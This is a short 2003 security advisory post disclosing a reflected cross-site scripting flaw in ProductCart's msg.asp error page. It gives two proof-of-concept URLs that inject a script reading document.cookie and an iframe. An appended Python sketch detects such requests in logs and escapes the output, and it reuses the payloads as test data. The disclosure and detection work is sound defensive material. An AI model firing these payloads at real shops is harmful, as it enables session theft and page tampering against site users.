ProductCart XSS Vulnerability

From: atomix atomix (at0mix87yahoo.com)
Date: Sat Jul 05 2003 - 00:29:49 CDT


#####################
# ProductCart XSS #
# Vulnerability #
# found by atomix #
#####################

I came across the fact that in an area of ProductCart you are able to
manipulate the error message, therefore allowing tags such as <script> and
<iframe> to be used:

http://www.website.com/ProductCart/pc/msg.asp?message=><script>alert(document.cookie);</script>

http://www.website.com/ProductCart/pc/msg.asp?message=<iframe%20src="C:\"%20width=400%20height=400></iframe>

-atomix | atom b0mbs
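
A defender-side sketch of the issue described in this post, added here and not part of the original message or of ProductCart's code: it flags `msg.asp` requests whose `message` parameter decodes to HTML markup, and shows the output-encoding step that renders such a value inert. The function names, the `div` wrapper and the sample request targets are assumptions constructed for illustration.

```python
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

# An opening or closing HTML tag, e.g. <script> or </iframe>.
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")

def decoded_message(request_target):
    """Return the decoded 'message' parameter of a msg.asp request, else None."""
    parts = urlsplit(request_target)
    if not parts.path.lower().endswith("/msg.asp"):
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("message")
    if not values:
        return None
    value = values[0]
    # Undo nested URL- and entity-encoding (%253C, %26lt%3B) before matching.
    for _ in range(3):
        previous = value
        value = html.unescape(unquote(value))
        if value == previous:
            break
    return value

def carries_markup(request_target):
    """True when the message parameter contains an HTML tag once decoded."""
    msg = decoded_message(request_target)
    return bool(msg and TAG_RE.search(msg))

def render_message(raw):
    """Assumed fix: HTML-encode the value before writing it into the page."""
    return '<div class="msg">' + html.escape(raw, quote=True) + "</div>"

# Constructed request targets, as they would appear in a web server access log.
SAMPLE_REQUESTS = [
    "/ProductCart/pc/msg.asp?message=Your+cart+is+empty",
    "/ProductCart/pc/msg.asp?message=%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E",
    '/ProductCart/pc/msg.asp?message=<iframe%20src="C:\\"%20width=400%20height=400></iframe>',
    "/ProductCart/pc/msg.asp?message=%253Ciframe%2520src%253Dx%253E",
    "/ProductCart/pc/viewCart.asp?message=<b>",
]

def flagged(requests):
    """Return the request targets whose msg.asp message carries markup."""
    return [r for r in requests if carries_markup(r)]

if __name__ == "__main__":
    for r in flagged(SAMPLE_REQUESTS):
        print("markup in message:", r)
```

In classic ASP the equivalent of `render_message` is passing the query-string value through `Server.HTMLEncode` before writing it to the response.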